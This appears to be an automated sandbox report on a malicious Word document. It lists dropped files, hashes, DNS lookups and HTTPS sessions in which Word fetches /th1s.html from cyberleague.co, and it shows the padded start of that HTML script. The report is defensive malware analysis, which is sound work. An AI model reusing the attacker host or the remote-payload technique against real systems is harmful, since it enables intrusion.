                                                                                                                                                            Preview:<!DOCTYPE html>..<html>..<body>.. <script>.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..

                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\20220531_180800.rtf.LNK

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:31:43 2022, mtime=Sat Jun 4 05:03:25 2022, atime=Sat Jun 4 05:03:05 2022, length=199522, window=hide
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1080
                                                                                                                                                            Entropy (8bit):4.662475618409437
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:8JU0UQuElPCH2bQtfiYIeF+WVBUWQqAjAsg/2KYDwG5y35yp4t2Y+xIBjKZm:8+3t75BUBtAsgmDwj67aB6m
                                                                                                                                                            MD5:1A876E870976DC0047C960C625D6B81F
                                                                                                                                                            SHA1:E7CE531CEA5DF1032015A4C6B6F6A5512CB94918
                                                                                                                                                            SHA-256:816BBF82C865204A0FA8BC08FABD97B3E0ED6FC4D45E8D26BC2B8B956E592B6B
                                                                                                                                                            SHA-512:B978B808E8712EFD9B2DC27265915BB5ACCBF59148C2FF1DAC9CC9CBADC226DC289494297142C4E0D078DA38B22330C87270251EB5F8C7643A88FE776631C355
                                                                                                                                                            Malicious:true
                                                                                                                                                            Preview:L..................F.... ........3.......w.......w..b............................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...TZ0....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....hT....user.<.......Ny..TZ0.....S....................D.;.h.a.r.d.z.....~.1.....hT....Desktop.h.......Ny..TZ0.....Y..............>.......'.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....t.2.b....Tc0 .202205~1.RTF..X......hT...Tc0....h.....................C...2.0.2.2.0.5.3.1._.1.8.0.8.0.0...r.t.f.......Y...............-.......X...........>.S......C:\Users\user\Desktop\20220531_180800.rtf..*.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.2.0.2.2.0.5.3.1._.1.8.0.8.0.0...r.t.f.........:..,.LB.)...As...`.......X.......768287...........!a..%.H.VZAj...>............-..!a..%.H.VZAj...>............-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1

                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):96
                                                                                                                                                            Entropy (8bit):4.639669008145431
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:bDuMJlHDInDdrFomxWIMovPDInDdrFov:bCBzNczy
                                                                                                                                                            MD5:C5F054026C8061C622BB0F1DAB7A99B0
                                                                                                                                                            SHA1:BD0930F6F9CF853909D7FDE6ED4690A517D456A3
                                                                                                                                                            SHA-256:E3805EFA3C64718616E0376881EA4E39FD164075412D0485F345138120AD9853
                                                                                                                                                            SHA-512:15D8C875F424C633DCE521147A2583E3AC93D749B4E5771C64802488F0F04DFD405458AF5B235857BD94ADC326A06765A5968BDB516754E87536ED8C51EACB89
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:[folders]..Templates.LNK=0..20220531_180800.rtf.LNK=0..[misc??????]..20220531_180800.rtf.LNK=0..

                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):162
                                                                                                                                                            Entropy (8bit):2.1027108526921086
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Rl/ZdfXGMl9/nTRdttl/dptJ:RtZdWMldTRXdptJ
                                                                                                                                                            MD5:0182DAC577AA3F876A2B371C3476C9DB
                                                                                                                                                            SHA1:19149426C4E2513AE4D18C4CDD213B31CD04C4DF
                                                                                                                                                            SHA-256:AC5A33C45B852FEFAC49BA2A7E5808EF599902722B6A11E8FFF9310DFDA058F2
                                                                                                                                                            SHA-512:A6196D173F73408376470CC011FBCE00B27B53A40F4EF4C1AEF0AA43FEBF435B9036149B57A7E8DACF50568DF354EF527C74E7CEB87110ECA1D56D1077EE831A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.pratesh................................................p.r.a.t.e.s.h.........+'qc.3........................../'uc-4..........................#'yc45..........T...

                                                                                                                                                            C:\Users\user\Desktop\~$220531_180800.rtf

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):162
                                                                                                                                                            Entropy (8bit):2.1027108526921086
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Rl/ZdfXGMl9/nTRdttl/dptJ:RtZdWMldTRXdptJ
                                                                                                                                                            MD5:0182DAC577AA3F876A2B371C3476C9DB
                                                                                                                                                            SHA1:19149426C4E2513AE4D18C4CDD213B31CD04C4DF
                                                                                                                                                            SHA-256:AC5A33C45B852FEFAC49BA2A7E5808EF599902722B6A11E8FFF9310DFDA058F2
                                                                                                                                                            SHA-512:A6196D173F73408376470CC011FBCE00B27B53A40F4EF4C1AEF0AA43FEBF435B9036149B57A7E8DACF50568DF354EF527C74E7CEB87110ECA1D56D1077EE831A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.pratesh................................................p.r.a.t.e.s.h.........+'qc.3........................../'uc-4..........................#'yc45..........T...

                                                                                                                                                            Static File Info

                                                                                                                                                            General

                                                                                                                                                            File type:Microsoft OOXML
                                                                                                                                                            Entropy (8bit):7.9948510704789975
                                                                                                                                                            TrID:
                                                                                                                                                            • Word Microsoft Office Open XML Format document (49504/1) 49.01%
                                                                                                                                                            • Word Microsoft Office Open XML Format document (43504/1) 43.07%
                                                                                                                                                            • ZIP compressed archive (8000/1) 7.92%
                                                                                                                                                            File name:20220531_180800.rtf
                                                                                                                                                            File size:199522
                                                                                                                                                            MD5:7b9c8e08371550238fbcd7cee1c8087d
                                                                                                                                                            SHA1:ff8c9deb358b2d22aa086cf36406461e8e9978b2
                                                                                                                                                            SHA256:b93326f795459d836c277730058e9923ab5f9bfbcef32e1c951e4a0d7538f9f5
                                                                                                                                                            SHA512:962c4c0a48519ffa81a95771b25987cc6aeed4bb8737e1e5ab242233f849370d72675f08da3628270bad410659772f437209d7f02bed089b5a220f97314ec1f4
                                                                                                                                                            SSDEEP:3072:LP/BkCPAXydgrYOUIr0XX95JQ7Anr5w2wJLWsk2n3rYxNYlT+MaJis19s9k:b/qXySM3XtQMnrq2Jon3MfYoL19s9k
                                                                                                                                                            TLSH:7814131876E61EB9C60F3BB6B875A1076B9F0017EC14D2BF0C6065F98931964B670F8B
                                                                                                                                                            File Content Preview:PK..........!....iw...........[Content_Types].xml.T.n.0..W.? _#p.CUU!9t96..~.1.q.M...}.HQ........y..f........F.d..I...\.2%.....D>0.3i4.d..L'.7.......}J.!.GJ=_.b>1.4".q..<..Z.?Y..n8.....:... ..3.l-C....M.Lh.=5u.UJ..Rp.........(.....BJb$....@h.>..H_.*....n.

                                                                                                                                                            File Icon

                                                                                                                                                            Icon Hash:74f4c4c6c1cac4d8

                                                                                                                                                            Network Behavior

                                                                                                                                                            Network Port Distribution

                                                                                                                                                            TCP Packets

                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Jun 3, 2022 23:03:12.042546988 CEST49741443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:12.042619944 CEST4434974113.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:12.042687893 CEST49741443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:12.043098927 CEST49741443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:12.043123007 CEST4434974113.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:12.441701889 CEST4434974113.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:12.441899061 CEST49741443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:12.594789982 CEST49741443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:12.594856024 CEST4434974113.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:12.595130920 CEST4434974113.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:12.597747087 CEST49741443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:12.644520998 CEST4434974113.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:12.826128006 CEST4434974113.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:12.826225042 CEST4434974113.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:12.826323032 CEST49741443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:12.839334011 CEST49741443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:12.839390993 CEST4434974113.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:12.839407921 CEST49741443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:12.839416027 CEST4434974113.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:12.925065994 CEST49744443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:12.925132036 CEST4434974413.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:12.925210953 CEST49744443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:12.926445961 CEST49744443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:12.926471949 CEST4434974413.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:13.308842897 CEST4434974413.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:13.313462019 CEST49744443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:13.313499928 CEST4434974413.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:13.314897060 CEST49744443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:13.314929008 CEST4434974413.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:13.685409069 CEST4434974413.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:13.685566902 CEST4434974413.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:13.685663939 CEST49744443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:13.685729027 CEST4434974413.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:13.685750008 CEST49744443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:13.685764074 CEST4434974413.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:13.685776949 CEST49744443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:13.685785055 CEST4434974413.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:16.733316898 CEST49746443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:16.733378887 CEST4434974613.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:16.733489990 CEST49746443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:16.733768940 CEST49746443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:16.733787060 CEST4434974613.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:17.141038895 CEST4434974613.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:17.141642094 CEST49746443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:17.141695976 CEST4434974613.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:17.142771006 CEST49746443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:17.142786026 CEST4434974613.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:17.544548035 CEST4434974613.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:17.544698954 CEST4434974613.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:17.544766903 CEST49746443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:17.544823885 CEST4434974613.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:17.544878960 CEST49746443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:17.544899940 CEST4434974613.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:17.729070902 CEST49747443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:17.729166031 CEST4434974713.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:17.729268074 CEST49747443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:17.729895115 CEST49747443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:17.729923964 CEST4434974713.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:18.112638950 CEST4434974713.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:18.112771988 CEST49747443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:18.122047901 CEST49747443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:18.122102022 CEST4434974713.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:18.122711897 CEST4434974713.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:18.122807026 CEST49747443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:18.123374939 CEST49747443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:18.164509058 CEST4434974713.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:18.487524033 CEST4434974713.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:18.487576008 CEST4434974713.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:18.487673044 CEST4434974713.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:18.487715006 CEST49747443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:18.487747908 CEST49747443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:18.487756968 CEST49747443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:18.488909006 CEST49747443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:18.488945007 CEST4434974713.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:18.696450949 CEST49748443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:18.696521044 CEST4434974813.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:18.696635008 CEST49748443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:18.696944952 CEST49748443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:18.696978092 CEST4434974813.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:19.077434063 CEST4434974813.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:19.077559948 CEST49748443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:19.077939987 CEST49748443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:19.077960014 CEST4434974813.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:19.082124949 CEST49748443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:19.082139015 CEST4434974813.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:19.454433918 CEST4434974813.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:19.454556942 CEST4434974813.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:19.454586983 CEST49748443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:19.454638958 CEST49748443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:19.454749107 CEST49748443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:19.454785109 CEST4434974813.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:19.454799891 CEST49748443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:19.454858065 CEST49748443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:19.638972998 CEST49749443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:19.639030933 CEST4434974913.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:19.639137030 CEST49749443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:19.639359951 CEST49749443192.168.2.313.250.15.191
                                                                                                                                                            Jun 3, 2022 23:03:19.639388084 CEST4434974913.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:20.015038967 CEST4434974913.250.15.191192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:20.015166998 CEST49749443192.168.2.313.250.15.191

                                                                                                                                                            UDP Packets

                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Jun 3, 2022 23:03:11.982377052 CEST5811653192.168.2.38.8.8.8
                                                                                                                                                            Jun 3, 2022 23:03:12.041520119 CEST53581168.8.8.8192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:17.620388031 CEST6535853192.168.2.38.8.8.8
                                                                                                                                                            Jun 3, 2022 23:03:17.727202892 CEST53653588.8.8.8192.168.2.3

                                                                                                                                                            DNS Queries

                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                            Jun 3, 2022 23:03:11.982377052 CEST192.168.2.38.8.8.80x8c64Standard query (0)cyberleague.coA (IP address)IN (0x0001)
                                                                                                                                                            Jun 3, 2022 23:03:17.620388031 CEST192.168.2.38.8.8.80x2d69Standard query (0)cyberleague.coA (IP address)IN (0x0001)

                                                                                                                                                            DNS Answers

                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                            Jun 3, 2022 23:03:12.041520119 CEST8.8.8.8192.168.2.30x8c64No error (0)cyberleague.co13.250.15.191A (IP address)IN (0x0001)
                                                                                                                                                            Jun 3, 2022 23:03:17.727202892 CEST8.8.8.8192.168.2.30x2d69No error (0)cyberleague.co13.250.15.191A (IP address)IN (0x0001)

                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                            • cyberleague.co

                                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            0192.168.2.34974113.250.15.191443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-06-03 21:03:12 UTC0OUTOPTIONS / HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Authorization: Bearer
                                                                                                                                                            User-Agent: Microsoft Office Word 2014
                                                                                                                                                            X-Office-Major-Version: 16
                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                            X-FeatureVersion: 1
                                                                                                                                                            X-MSGETWEBURL: t
                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                            Host: cyberleague.co
                                                                                                                                                            2022-06-03 21:03:12 UTC0INHTTP/1.1 200 OK
                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                            Date: Fri, 03 Jun 2022 21:03:12 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 0
                                                                                                                                                            Connection: close
                                                                                                                                                            Allow: GET,POST,OPTIONS,HEAD,TRACE


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            1192.168.2.34974413.250.15.191443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-06-03 21:03:13 UTC0OUTHEAD /th1s.html HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Authorization: Bearer
                                                                                                                                                            User-Agent: Microsoft Office Word 2014
                                                                                                                                                            X-Office-Major-Version: 16
                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                            X-FeatureVersion: 1
                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                            Host: cyberleague.co
                                                                                                                                                            2022-06-03 21:03:13 UTC0INHTTP/1.1 200 OK
                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                            Date: Fri, 03 Jun 2022 21:03:13 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 5092
                                                                                                                                                            Connection: close
                                                                                                                                                            Last-Modified: Wed, 01 Jun 2022 14:36:34 GMT
                                                                                                                                                            ETag: "13e4-5e063d0e1ca1e"
                                                                                                                                                            Accept-Ranges: bytes


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            10192.168.2.34975413.250.15.191443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-06-03 21:03:25 UTC9OUTHEAD /th1s.html HTTP/1.1
                                                                                                                                                            Authorization: Bearer
                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                            User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                            Host: cyberleague.co
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            2022-06-03 21:03:25 UTC9INHTTP/1.1 200 OK
                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                            Date: Fri, 03 Jun 2022 21:03:25 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 5092
                                                                                                                                                            Connection: close
                                                                                                                                                            Last-Modified: Wed, 01 Jun 2022 14:36:34 GMT
                                                                                                                                                            ETag: "13e4-5e063d0e1ca1e"
                                                                                                                                                            Accept-Ranges: bytes


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            11192.168.2.34975513.250.15.191443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-06-03 21:03:28 UTC10OUTHEAD /th1s.html HTTP/1.1
                                                                                                                                                            Authorization: Bearer
                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                            User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                            Host: cyberleague.co
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            2022-06-03 21:03:29 UTC10INHTTP/1.1 200 OK
                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                            Date: Fri, 03 Jun 2022 21:03:29 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 5092
                                                                                                                                                            Connection: close
                                                                                                                                                            Last-Modified: Wed, 01 Jun 2022 14:36:34 GMT
                                                                                                                                                            ETag: "13e4-5e063d0e1ca1e"
                                                                                                                                                            Accept-Ranges: bytes


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            2192.168.2.34974613.250.15.191443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-06-03 21:03:17 UTC0OUTOPTIONS / HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Authorization: Bearer
                                                                                                                                                            User-Agent: Microsoft Office Word 2014
                                                                                                                                                            X-Office-Major-Version: 16
                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                            X-FeatureVersion: 1
                                                                                                                                                            X-MSGETWEBURL: t
                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                            Host: cyberleague.co
                                                                                                                                                            2022-06-03 21:03:17 UTC1INHTTP/1.1 200 OK
                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                            Date: Fri, 03 Jun 2022 21:03:17 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 0
                                                                                                                                                            Connection: close
                                                                                                                                                            Allow: GET,POST,OPTIONS,HEAD,TRACE


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            3192.168.2.34974713.250.15.191443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-06-03 21:03:18 UTC1OUTGET /th1s.html HTTP/1.1
                                                                                                                                                            Accept: */*
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                            Host: cyberleague.co
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            2022-06-03 21:03:18 UTC1INHTTP/1.1 200 OK
                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                            Date: Fri, 03 Jun 2022 21:03:18 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 5092
                                                                                                                                                            Connection: close
                                                                                                                                                            Last-Modified: Wed, 01 Jun 2022 14:36:34 GMT
                                                                                                                                                            ETag: "13e4-5e063d0e1ca1e"
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2022-06-03 21:03:18 UTC1INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 20 20 20 20 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
